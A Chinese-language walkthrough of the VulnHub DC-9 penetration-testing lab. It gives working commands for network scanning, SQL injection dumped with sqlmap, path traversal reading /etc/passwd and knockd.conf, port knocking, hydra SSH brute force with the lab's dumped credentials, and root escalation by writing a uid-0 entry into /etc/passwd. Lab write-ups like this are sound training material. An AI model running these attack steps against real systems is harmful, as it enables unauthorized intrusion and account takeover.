vulnhub靶场之DC-9

一.环境搭建

1.靶场描述

复制代码
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
复制代码

只有一个flag

2.靶场下载地址

复制代码
https://www.vulnhub.com/entry/dc-9,412
复制代码

3.启动靶场

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

复制代码
nmap -sP 192.168.52.0/24
复制代码
复制代码
arp-scan -l
复制代码

靶场的真实ip地址是192.168.52.131

(2)探测端口及服务

复制代码
nmap -A -v -p- 192.168.52.131
复制代码

注意到ssh服务端口是filtered的,可能是因为什么原因关闭了

复制代码
发现开放了80端口,APache httpd 2.4.38((debian))
复制代码

也可以使用masscan进行探测

复制代码
masscan --rate=10000 --ports 0-65535 192.168.52.131
复制代码

(3)web指纹识别

复制代码
whatweb -v 192.168.52.131
复制代码

3.渗透测试

(1)访问web服务

复制代码
http://192.168.52.131
复制代码

没有如何有用的信息

(2)扫描web服务

1)棱洞3.0指纹识别
复制代码
./EHole_linux_amd64 finger -u http://192.168.52.130
复制代码
2)nikto扫描网站结构
复制代码
nikto -h http://192.168.52.131
复制代码

上面两个都没有扫描到有用的信息

3)dirsearch目录扫描
复制代码
dirsearch -u 192.168.52.131 -e * -x 403 --random-agent
复制代码

我们可以看到扫描到2个有用的信息,一个/inex.php/login,一个/manage.php

我们分别访问

我们可以看到是一个登录页面,看来需要我们进行登录,但是不知道用户名和密码,我们对页面进行探测

(3)渗透测试

1)页面探测

我们可以看到4个页面,我们一一进行探测,最后发现search存在POST型SQL注入

2)SQL注入

我们进行测试

复制代码
search=1
复制代码
复制代码
search=1' or 1#
复制代码

证明存在SQL注入,我们使用sqlmap进行爆破

爆破数据库

复制代码
sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1'

sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' --dbs
复制代码

我们看到存在3个数据库,我们爆破 Staff

爆破表名

复制代码
sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' --tables
复制代码

爆破字段名

复制代码
sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' --columns
复制代码

爆破用户名和密码

复制代码
sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' -C 'UserID,Username,Password' --dump
复制代码

我们可以看到只有一个用户名和密码,密码是md5加密的,我们进行解密即可

密码是transorbital1

3)登录后台

我们接着用该密码登入后台

就多了个Add Record界面,注意到下面有File does not exist,想到是程序引用或读取了一个不存在的文件才会回显这个,接着用参数fuzz测试一下

burpsuite抓包,构建payload

复制代码
?§§=../../../../../etc/passwd
复制代码

然后再把我们的参数字典加载进来

参数名是file,存在目录遍历漏洞

4)端口敲门服务

考虑到ssh端口是关闭的,可能是开启了knock服务(参考端口敲门服务),利用文件包含确认一下,一般开启了knock服务就会存在/etc/knockd.conf文件

构造payload

复制代码
/manage.php?file=../../../../../etc/knockd.conf
复制代码

果然有,开启ssh服务得依次敲击7469,8475,9842端口,利用netcat进行敲击

复制代码
nc -z 192.168.52.131 7469 8475 9842
复制代码

敲击完后发现端口打开了

5)ssh爆破

我们使用ssh进行登录,发现登录不了

想起之前SQLmap跑出过一个users的数据库, 存放网站用户信息的,我们去瞧一下

复制代码
sqlmap -u "http://192.168.52.131/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'users' -dump
复制代码

用这些账号密码组成字典,爆破ssh

username.txt

复制代码
marym 
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
复制代码

password.txt

复制代码
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
复制代码

接下来用九头蛇进行爆破

复制代码
hydra -L username.txt -P password.txt ssh://192.168.52.131
复制代码

爆破出来3个用户名和密码

复制代码
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
复制代码

尝试登入发现janitor用户有东西

有几个密码,复制到刚才的password文件继续爆破ssh

新添加了一个用户

我们进行登录

发现有个root权限文件

6) 提权

发现这里有个脚本文件可以无密码以root用户权限执行,我们进入/opt/devstuff/dist/test目录下先看看有什么信息,全是文件,回到上一个目录查看,也没什么,再回到上一个目录查看,在/opt/devstuff目录下发现了一个test.py脚本文件

我们查看文件内容

这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,事先参考/etc/passwd解释

先利用openssl命令创建一个密码

复制代码
openssl passwd -1 -salt <用户名> <密码>
openssl passwd -1 -salt MS02423 MS02423
复制代码

得到hash密码,

复制代码
$1$MS02423$xCJ3D9eufDuODS1PBNjp51
复制代码

我们切换到tmp目录下,新建一个文件

复制代码
cd /tmp
echo 'MS02423:$1$MS02423$xCJ3D9eufDuODS1PBNjp51:0:0::/root:/bin/bash' > MS02423
复制代码

再回到/opt/devstuff/dist/test目录,执行程序test,将MS02423的文件内容写入到/etc/passwd文件里面

复制代码
cd /opt/devstuff/dist/test
 
sudo ./test /tmp/MS02423 /etc/passwd
复制代码

可以看到MS02423用户已经添加到/etc/passwd文件里了,接下来然后使用命令su MS02423 切换到我们添加的MS02423用户,输入之前设置好密码即可登录

跳转到/root目录下,成功看到flag

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.burp工具的使用

9.dirsearch目录扫描

10.SQL注入

11.ssh登录

12.openssl命令

13.端口敲门服务

14.hydra爆破

15.目录遍历漏洞

相关推荐
网安INF2 小时前
CVE-2020-1938源码分析与漏洞复现(Tomcat 文件包含/读取)
java·网络·web安全·网络安全·tomcat·漏洞复现
无名小猴3 小时前
bugku 网络安全事件应急响应
web安全
qq_243050794 小时前
sipsak:SIP瑞士军刀!全参数详细教程!Kali Linux教程!
linux·web安全·网络安全·黑客·教程·kali linux·voip工具
星哥说事6 小时前
开源综合性网络安全检测和运维工具-TscanClient
运维·web安全·开源
熙客7 小时前
网络安全:OWASP防护守则
安全·web安全
领世达检测V133529092498 小时前
智能云打印机EN 18031申请认证流程
安全·web安全
工程师00711 小时前
C#AES加密
网络·安全·web安全·c#
塔子终结者11 小时前
网络安全A模块专项练习任务七解析
安全·web安全·网络安全
安全系统学习12 小时前
网络安全之框架安全漏洞分析
开发语言·python·计算机网络·web安全·网络安全
上海云盾第一敬业销售13 小时前
什么是渗透测试,对网站安全有哪些帮助?
网络·安全·web安全